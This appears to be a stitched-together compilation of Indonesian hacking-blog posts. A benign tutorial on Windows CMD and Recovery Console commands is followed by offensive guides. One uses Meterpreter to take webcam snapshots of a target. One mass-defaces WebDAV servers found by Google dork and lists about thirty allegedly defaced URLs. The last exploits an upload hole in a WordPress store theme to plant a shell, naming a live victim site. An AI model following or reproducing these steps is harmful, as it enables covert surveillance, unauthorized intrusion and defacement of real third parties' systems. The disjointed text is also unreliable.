• Tab Display yaitu proses pemunculan proxy sakti yang sudah di-scan. Ada beberapa kesalahan yang biasa dilakukan, yaitu dengan hanya menampilkan proxy yang open port saja (warna hijau saja), semua port alive (hidup) tidak ditampilkan. Yang sebenarnya proxy alive (warna biru) ini mungkin saja open port hanya saja karena jaringan pada saat scanning itu lemot jadinya port tidak terscanning, jadi untuk pengaturanya sebaiknya gunakan all scanned hosts

Rahasia dan Fungsi perintah CMD

Assalamualaikum wr.wb
Temen-temen pasti sudah pada tahu kan program kecil ini  toll ini adalah bawaan dari Ms.windows mas bro… Ane mau share beberapa kegunaan atau fungsi dari program dari CMD (Command) ini, walaupun sudah bisa dibilang sangat-sangat jadul, tapi masih banyak yang menggunakan aplikasi ini silahkan di simak masbro semoga bermanfaat:

1. KONVERSI FAT/FAT32 KE NTFS
- Buka Command Prompt
- Ketik convert D: /fs:ntfs
(artinya merubah file system pada drive D:\ menjadi NTFS)
Catatan :
- Jika system tidak bisa Lock drive, pilih ‘Yes’ pada peringatan ‘Convert it during next boot’
- Konversi dari FAT/FAT32 ke NTFS ini tidak bersifat merusak, sehingga data tidak akan hilang

2. DETEKSI PERUBAHAN REGISTRY
- Buka Command Prompt
- Ketik regedit
- Import Registry Key dengan nama Awal.reg
- Setelah terjadi banyak perubahan di PC
- Import Registry Key sekarang dengan nama Sekarang.reg
- Tutup Regedit
- Kembali ke Command Prompt
- Ketik fc awal.reg sekarang.reg > bedanya.txt
- buka file Bedanya.txt yg berisi perubahan Registry dengan notepad

3. SIMPAN STRUKTUR FOLDER & FILE
- Buka Command Prompt
- Ketik dir C: /s > struktur.txt
- Daftar seluruh File & Folder di C: akan disimpan di file teks STRUKTUR.TXT

4. EDIT BOOT LOADER XP
- Buka Command Prompt
- Ketik cd\ untuk berada di root directory system
- Ketik attrib boot.ini -r -s -h
- Ketik edit boot.ini

Contoh isi file boot.ini pada dual OS Windows XP Mandarin & XP English :
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=”Microsoft Windows XP Professional” /noexecute=optin /fastdetect
multi(0)disk(0)rdisk(0)partition(2)\WINDOWS=”Microsoft Windows XP Professional” /noexecute=optin /fastdetect

Keterangan :
- TimeOut : Waktu tunggu sebelum pemilihan OS dilakukan, dalam satuan detik
- Default : Partisi OS yang akan dipilih sebagai default, sehingga akan dieksekusi saat tidak dilakukan pilihan
- MultiDisk : Urutan pilihan yang tampil saat boot, ubah urutan partisi dan kata didalam ” ” (tanda petik) sesuai selera

5. RECOVERY CONSOLE
Dengan CD Installer
- Masuk BIOS, atur agar first boot pada CD/DVD
- Selanjutnya serupa dengan proses Install Windows
- Sampai bagian Welcome to Setup, tekan R untuk masuk ke dalam Recovery Console.
- Setelah masuk, pilih Windows mana yang akan dimasuki melalui Recovery Console (jika ada beberapa Windows ter-install) dengan memilih angkanya.
- Masukkan password Administrator
- Jika password benar, akan muncul prompt C:\Windows>, Recovery Console siap menerima input

Command di Recovery Console

- Attrib : Perintah untuk mengubah atribut sebuah file atau direktori.
Contoh : ?attrib -h c:\config.sys? artinya, file config.sys yang berlokasi di direktori root C telah dihilangkan atribut Hidden-nya.

- Batch : Perintah untuk menjalankan sekumpulan perintah Recovery Console yang ada di sebuah file teks.
Contoh : ?batch runme.txt postrun.txt? artinya, perintah batch akan menjalankan perintah yang sudah ditulis didalam file input runme.txt, sedangkan file postrun.txt sendiri akan dibuat secara otomatis sebagai output file

- Bootcfg : Dipakai untuk membuat atau memodifikasi file boot.ini.
Contoh : ?bootcfg /scan? artinya semua harddisk yang aktif akan diperiksa apakah ada Windows-nya.

- Chdir : Perintah untuk menampilkan huruf drive dan folder yang sedang dimasuki, juga untuk mengubah drive datau direktori yang ingin dipakai.
Contoh : ?chdir system32? artinya, lokasi akan berpindah langsung ke direktori System32.

- Chkdsk : Perintah untuk mengidentifikasi dan memperbaiki error pada harddisk.

Contoh : ?chkdsk c: /p? artinya, drive C akan diperiksa apakah ada error-nya, sekaligus diperbaiki

- Cls : Perintah untuk membersihkan layar dari teks.

- Copy : Perintah untuk menyalin file dari satu lokasi ke lokasi lain.
Contoh : ?copy d:\i386\atapi.sy_ c:\atapi.sys? artinya, file atapi.sy_ didalam folder D:\i386 akan disalin ke C:\ dengan nama atapi.sys.

- Delete : Perintah untuk menghapus sebuah file.
Contoh : ?delete c:\atapi.sys? artinya, file atapi.sys pada root drive C akan dihapus.

- Dir : Perintah untuk menampilkan daftar file atau folder pada folder aktif, juga informasi penting lain seperti nomor seri harddisk, jumlah file, ukuran serta kapasitas harrdisk.
Contoh : ?dir c:\*.* /p ? artinya, semua yang ada di root C termasuk subfolder akan ditampilkan per halaman.

- Disable : Perintah untuk men-disable sebuah service atau driver.
Contoh : ?disable imapi? artinya, service bernama IMAPI CD-Burning COM Service akan di-disable. Untuk menampilkan daftar service digunakan perintah Listsvc.

- Diskpart : Perintah untuk membuat atau menghapus partisi pada harddisk.
Contoh : ?diskpart /add \Device\HardDisk0 1000? artinya, pada harddisk primary akan dibuat sebuah partisi baru dengan ukuran 1000MB. Cukup ketik diskpart untuk masuk pada interaktif mode.

- Enable : Perintah untuk mengaktifkan service atau driver.
Contoh : ?enable imapi SERVICE_AUTO_START? artinya, service imapi diaktifkan dengan jenis startup SERVICE_AUTO_START.

- Exit : Perintah untuk mengakhiri Recovery Console.

- Expand : Perintah untuk mengekstrak file dari sebuah file terkompresi pada file CAB atau ZIP. Contoh : ?expand d:\cmpnents\netfx\i386\netfx.cab /f:alink.dll c:\? artinya, file bernama alink.dll dalam file terkompresi netfx.cab yang ada di D:\cmpnents\netfx\i386 diekstrak ke C:\.

- Fixboot : Perintah untuk menuliskan boot sector pada partisi yang ditentukan, terutama pada saat boot sector mengalami korup.
Contoh : ?fixboot c:? artinya, menulis ulang boot sector pada drive C.

- Fixmbr : Perintah untuk menuliskan om Boot Record (MBR) baru ke harddisk, terutama saat virus merusak MBR sehingga Windows tidak bisa di boot.
Contoh : ?fixmbr \Device\Harddisk0? artinya, MBR akan ditulis ulang pada harddisk primary.

- Format : Perintah untuk memformat drive yang diingink

 Contoh : ?format c: /q /fs:NTFS? artinya, drive C akan diformat menggunakan file system NTFS dengan metode quick format.

- Listsvc : Perintah untuk menampilkan daftar service dan driver dari Windows yang sedang aktif.

- Help : Perintah untuk menampilkan informasi yg lebih detil tentang semua perintah di Recovery Console.alasi Windows yang ditentukan jika terdapat lebih dari satu Windows, saat ingin berpindah dari Windows satu ke lainnya tanpa melalui proses booting.

- Map : Perintah untuk menampilkan partisi, huruf drive, dan file system yang dipakai oleh Windows aktif.

- Mkdir : Perintah untuk membuat folder baru.

- More : Perintah untuk menampilkan isi dari file yang bisa dibuka dengan Notepad seperti TXT, INI, LOG, OLD, REG, BAT, dll.
Contoh : ?more c:\windows\system.ini? artinya, file bernama system.ini pada direktori C:\Windows akan dilihat isinya.

- Rename : Perintah untuk mengubah nama sebuah file.
Contoh : ?rename c:\windows\funny.log cute.log? artinya, file bernama funny.log pada direktori C:\Windows diubah menjadi cute.log.

- Rmdir : Perintah untuk menghapus sebuah folder.

- Set : Perintah untuk mengaktifkan atau me-nonaktifkan empat opsi di Recovery Console yaitu Allowwildcards, Allowallpaths, Allowremovablemedia dan Nocopyprompt.

- Systemroot : Perintah untuk mengembalikan ke folder systemroot dalam hal ini C:\Windows.

- Type : Perintah yang sama fungsinya dengan perintah More.
Contoh : ?type c:\boot.ini? artinya, menampilkan isi file boot.ini yang ada di direktori C.

Memperbaiki / Mengganti File Boot.ini
- Masuk ke Recovery Console
- Ketik bootcfg /rebuild pada prompt
- Ketik ?Y? pada pertanyaan Add installation to boot list? (Yes/No/All)?
- Ketik versi Windows (co: Windows XP Professional) yang digunakan pada pertanyaan Enter Load Identifier:
- Ketik /fastdetect pada pertanyaan Enter OS Load options:
- Eject CD dan restart PC.

Merestore NTLDR dan Ntdetect[dot]com
- Masuk ke Recovery Console
- Ketik copy d:\i386\ntldr c:\ pada prompt
- Ketik ?Y? pada pertanyaan Overwrite
- Ketik copy d:\i386\ntdetect.com c:\ pada prompt
- Eject CD dan restart PC.

6. AKSES CD-ROM SAAT SAFEMODE
- Saat booting tekan F8
- Pilih Command Prompt only
- Ketik win /d:m

7. BUAT/EDIT AUTORUN.INF
- Masuk Command Prompt
- Ketik edit autorun.inf
- buat/edit file dengan struktur :

Header, selalu dimulai dengan tulisan ini
[autorun]

Icon, ikon device yang tampil di Explorer, contoh :
icon=doraemon.ico
icon=\my icon\doraemon.ico
icon=doraemon.exe
icon=system.dll, 2

Label, nama device yang tampilkan di Explorer, contoh :
label=Doraemon

Autoplay, aplikasi yang akan dieksekusi, contoh :
open=corel.exe
open=\program\corel.exe

Context Menu, menu yang ditampilkan saat klik kanan, contoh :
shell\aplikasi1\command=programku1.exe
shell\aplikasi2\command=aplikasi\programku2.exe

View File, membuka file saat device diakses, contoh :
shellexecute=http://www.google.co.id
shellexecute=\dokumen\readme.txt

8. MEMPERBAIKI BOOT.INI
- Masukkan CD Installer XP
- Booting dgn CD Installer XP
- Pada menu Microsoft Setup tekan R untuk masuk Recovery Console
- Pilih OS
- Masukkan password Admin
- Setelah masuk Command Prompt ketik bootcfg /rebuild
- Ketik Y untuk “Add installation to boot list? (Yes/No/All)”
- Ketik “Windows XP Profesional” atau “Windows XP Home Edition” untuk “Enter Load Identifier”
- Ketik /fastdetect untuk “Enter OS Load options”
- Keluarkan CD Installer XP
- Ketik exit, lalu restart komputer

9. MEMPERBAIKI om BOOT RECORD
MBR PADA WINDOWS XP
- Masukkan CD Installer XP
- Booting dgn CD Installer XP
- Pada menu Microsoft Setup tekan R untuk masuk Recovery Console
- Pilih OS yg akan di perbaiki
- Masukkan password Admin
- Setelah masuk Command Prompt ketik fixmbr
- Keluarkan CD Installer XP
- Ketik exit, lalu restart komputer
Cat: tidak boleh digunakan pada dual booting XP & Se7en

MBR PADA VISTA/SE7EN
- Masukkan CD Installer Vista/Se7en
- Booting dgn CD Installer Vista/Se7en
- Pilih Language, Time, Currency, dll lalu klik Next
- Klik Repair Your Computer
- Pilih OS yg akan di perbaiki
- Pilih Command Prompt
- Ketik bootrec.exe (boot configuration data), atau
bootrec.exe /fixmbr (hanya om boot record)
bootrec.exe /fixboot (boot sector)
bootrec.exe /rebuildbcd (keseluruhan data)

10. BUAT FILE UKURAN TERTENTU
- Buka program Calculator, pilih Scientific mode
- Ketik ukuran file yang dikehendaki, misal 1000000 (satu juta byte)
- Konversikan ke Hex, misal hasilnya F4240
- Tambahkan angka nol disebelah kiri hingga tercapai delapan digit, misal 000F4240
- Buka Command Prompt
- Ketik DEBUG FILEKU.DAT
- Abaikan pesan ‘File not found’
- Ketik RCX, lalu tekan Enter
- Ketik empat digit terakhir, misal 4240, lalu tekan Enter
- Ketik RBX, lalu tekan Enter
- Ketik empat digit pertama, misal 000F, lalu tekan Enter
- Ketik W (untuk Write)
- Ketik Q (untuk Quit)
- Selamat! File dengan nama FILEKU.DAT dg size 1MB tercipta!

11. COPAS DI COMMAND PROMPT
- Masuk Command Prompt
- Klik Kanan
- Pilih Mark
- Blok Teks/Baris yang akan di Copy
- Tekan Enter
- Buka Notepad
- Tekan Ctrl+V (Paste)

12. USB PRINTING DR COMMAND PROMPT
- Masuk Command Prompt
- Contoh, ketik C:\>start /min notepad /p D:\Coba.txt
(print file text lsg ke USB Printer dg bantuan Notepad yg di Minimized)

13. HAPUS/BUAT PARTISI
- Masuk Command Prompt
- Ketik diskpart
- Setelah masuk DISKPART>
- Ketik list disk
- Pilih HDD yg akan di hapus partisinya, contoh :
DISKPART> select disk 3
- Hapus semua partisi di HDD terpilih, contoh :
DISKPART> clean
- Buat Partisi Utama sebesar 10GB, contoh :
DISKPART> create partition primary size = 10000 DISKPART> create partition extended
- Sisa HDD dibuat Partisi Logical, contoh :
DISKPART> create partition logical
- Refresh dengan :
DISKPART> rescan
- Lihat hasilnya :
DISKPART> list partition
Cat : berbahaya, resiko di tanggung masing-masing!

14. WARNA DI COMMAND PROMPT
Daftar warna :
0 = Black
1 = Blue
2 = Green
3 = Aqua
4 = Red
5 = Purple
6 = Yellow
7 = White
8 = Gray
9 = Light Blue
A = Light Green
B = Light Aqua
C = Light Red
D = Light Purple
E = Light Yellow
F = Bright White

- Masuk Command Prompt
- Ketik color [warnalatar][warnateks], contoh :
color 46
(warna latar belakang merah, warna teks kuning)
- Untuk kembali ke warna asli, cukup ketik color

15. SIMPAN INFORMASI SYSTEM
- Masuk Command Prompt
- Ketik systeminfo > C:\Info.txt
- Ketik edit C:\Info.txt , atau
- Buka file Info.txt dengan Notepad

16. AKSES CEPAT - Masuk Command Prompt
Untuk mengakses secara langsung…
- ADD/REMOVE PROGRAMS, ketik appwiz.cpl
- CHARACTER MAP, ketik charmap
- COMPUTER MANAGEMENT, ketik compmgmt
- DATE TIME PROPERTIES, ketik timedate.cpl
- DEVICE MANAGER, ketik hdwwiz.cpl atau devmgmt
- DEVICE & PRINTER, ketik control printers
- DIRECTX DIAGNOSTIC, ketik dxdiag
- DISK CLEANUP, ketik cleanmgr
- DISPLAY PROPERTIES, ketik desk.cpl
- EASE OF ACCESS CENTER, ketik utilman
- EVENT VIEWER, ketik eventvwr
- FOLDER OPTIONS, ketik control folders
- FONTS, ketik control fonts
- GAME CONTROLLERS, ketik joy.cpl
- INTERNET PROPERTIES, ketik inetcpl.cpl
- KEYBOARD PROPERTIES, ketik control keyboard
- LOCAL GROUP POLICY EDITOR, ketik gpedit
- LOCAL SECURITY POLICY, secpol
- LOCAL USERS & GROUPS, ketik lusrmgr
- MOUSE PROPERTIES, ketik main.cpl atau control mouse
- NETWORK CONNECTIONS, ketik ncpa.cpl atau control netconnections
- PERFORMANCE MONITOR, ketik perfmon
- POWER OPTIONS, ketik powercfg.cpl
- PRIVATE CHARACTER EDITOR, ketik eudcedit
- REGIONAL SETTINGS, ketik intl.cpl
- REGISTRY EDITOR, ketik regedit
- REMOTE DESKTOP CONNECTION, ketik mstsc
- SECURITY CENTER, ketik wscui.cpl
- SHARED FOLDERS, ketik fsmgmt
- SOUND PROPERTIES, ketik mmsys.cpl
- SYSTEM CONFIGURATION, ketik msconfig
- SYSTEM PROPERTIES, ketik sysdm.cpl
- TASK SCHEDULER, ketik control schedtasks
- WINDOWS COLOR & APPEARANCE, ketik control color
- WINDOWS FIREWALL, ketik firewall.cpl
- WINDOWS MAGNIFY, ketik magnify
- WINDOWS SERVICES, ketik dcomcnfg
- WINDOWS TASK MANAGER, ketik taskmgr

17. LOGOFF, RESTART, SHUTDOWN
Logoff Komputer setelah 1 menit
- Masuk Command Prompt
- Ketik shutdown -l t 60

Restart Komputer setelah 1 jam
- Masuk Command Prompt
- Ketik shutdown -r t 360

Shutdown Komputer setelah 10 detik dg pesan
- Masuk Command Prompt
- Ketik shutdown -s t 10 -c “10 Detik Lagi Mati!”

Batalkan perintah
- Masuk Command Prompt
- Ketik shutdown -a

Hack Webcam With Backtrack

Kali ini saya akan share hack webcam pada laptop ataupun PC...

maaf tutorial ini tidak saya sertakan gambar , lagi sibuk berat gkgkgkgk...

jika sudah berada pada meterpreter lakukan 2 perintah ini..

1. webcam_list  ( cek apakah ada webcam di laptop.PC target )
jika muncul nama webcam/merk langsung lakukan perintah ini
2. webcam_snap

nanti webcam akan otomatis memoto dan tersimpan ..

ini contoh hasil punya saya...

Selamat Mencoba :D

Cara Mencari Target Vuln WebDav Dengan reverse IP

dah lama gak post sayangnya laptop vga ane rusak jadi maklumi tampilan segede gajah :/
Ok langsung aja pasti dah tau webdav kan ?
kalo blum tau mending google dulu
kalo udah nih ane kasih lagi softwarenya
WebDav Rootkit Hmei7 Download
Langsung cari target yg vuln dengan dork berikut
Dork WebDav : inurl:/Hmei7.asp;.txt site:com
ntar kurang lebih seperti ini gambarnya

Copy URL tersebut dan Paste di
http://www.yougetsignal.com/tools/web-sites-on-web-server/
Untuk mengetahui domain yang 1 server dengan web tersebut
Seperti ini

Found 40 domains hosted on the same web server as file9.bemycio.com (67.40.161.74).Lumayan lah 40 domain iseng-2 berhadiah gan

Langsung Copas smua tuh web di notepad kyk gambar ini
ini main replace pada notepad biar kita mudah/cepat untuk menyusun setiap domain tersebut
Ntar tiggal enter-enter aja kyk gini
< SPASI > di hapus di ganti spasi beneran -_-"

Habis itu Save AS file dengan nama terserahagan.txt

Habis itu buka webdav dan load File yang agan save tadi contoh punya ane x.txt

Habis itu Klik open
Jangan lupa setting yang ada di kanan langsung di Setting biar langsung file .html bukan shell .asp;.txt lagi
nih contoh langsung ane klik SERANG !!

Lihat Hampir smua domain ke Hack dalam 1 server tersebut hehe
nih hasilnya
http://norx.iatgroup.com/ca.html
http://of.gov.bemycio.com/ca.html
http://osaskol10.gov.mrkfs.com/ca.html
http://passs.bemycio.com/ca.html
http://pctcinc.net/ca.html
http://pnk.ac.bemycio.com/ca.html
http://polico.gov.mrkfs.com/ca.html
http://post39.com/ca.html
http://rich.mrkfs.com/ca.html
http://root.gov.bemycio.com/ca.html
http://s2ssddfg.gov.iatgroup.com/ca.html
http://sagmokh25.gov.mrkfs.com/ca.html
http://sasad.iatgroup.com/ca.html
http://www.inchalam.cl/mca.html
http://finance.cedare.int/mca.html
http://co.rhvacnet.com/mca.html
http://sd35dw.post39.com/ca.html
http://spesial.gov.iatgroup.com/ca.html
http://stupid.iatgroup.com/ca.html
http://tolol.bemycio.com/ca.html
http://upload100000.iatgroup.com/ca.html
http://upload3917.iatgroup.com/ca.html
http://uuuuuuuuuuuuccuuuuuuuuuuuu.gov.pctcinc.net/ca.html
http://windoqxsxws1.gov.mrkfs.com/ca.html
http://windows10.gov.mrkfs.com/ca.html
http://windows111111111.gov.mrkfs.com/ca.html
http://windows1222222.gov.mrkfs.com/ca.html
http://windows1244.gov.mrkfs.com/ca.html
http://windows63.gov.mrkfs.com/ca.html
http://ww.file9.bemycio.com/ca.html

Melihat Aksi Para Carder yang Sedang Beraksi

Kalo udah ngomongin soal "Carder" pasti yang pertama terlintas dibenak kita adalah tentang $$$ hahaha =D. Yups, karena carder memang selalu identik dengan kegiatan ilegal pencurian uang melalui kartu ATM, Visa, Web Shop Online dll.

An Carder In Actions

Namun, apakah kalian sudah pernah melihat secara langsung bagaimana para carder tersebut beraksi? Kayanya jarang deh yang tau, karena kalo dikasih bagaimana cara mereka membobol ATM kan bisa berabe... ketangkep pak pulici ntar :p.

Nah, sekarang saya mau kasih bocoran nih... tentang bagaimana para carder melakukan aksinya :D Inilah hasil pengamatan saya pribadi setelah mengelilingi beberapa forum underground Indonesia.

Screenshot Aksi Para Carder yang Sedang Beraksi :

Gimana, sekarang udah tau kan aksi para carder beraksi hahaha :D postingan ini hanya hiburan semata, tidak ada maksud untuk hal lain wkwkw :p.

Ok, Sekian saja postingan saya kali ini tentang Melihat Aksi Para Carder yang Sedang Beraksi, semoga dapat menghibur sobat sekalian. Kalo ga lucu ya maaf, lagian ane juga bukan pelawak kok :p

Deface WordPress Dengan Bug WP STORE

Selamat Subuh Bro ) , pada kesempatan Ini saya akan share Exploit WordPress WP-STORE
Okeh langsung aje ye kak =))
Dork :

inurl:/wp-content/themes/WPstore/

site:.th inurl:ptype=cart

site:.th inurl:ptype=store

NB : Site bisa di ganti sesuka kamu :p .il .mm dsb.

1. WPStore
2. eShop
3. KidzStore
4. Emporium
5. Store
6. eCommerce
7. framework
8. frameworkold

Theme bisa diganti [ganti pada bagian belakangnya itu lho]

1. Googling dengan menggunakan salah satu dork itu

2. Kalo udah ketemu tambahin /upload/ setelah path tema

[ex : http://localhost/wp-content/themes/framework/upload/]

3. Silakan upload ditempat itu, bisa berupa

php , txt , html , dll

4. Akses di mari

[http://localhost/wp-content/uploads/products_img/shell.php]

Live Target :

http://www.wholisticnutrition.com.au/

ini hasilnya http://www.wholisticnutrition.com.au/wp-content/uploads/products_img/mca.html  :D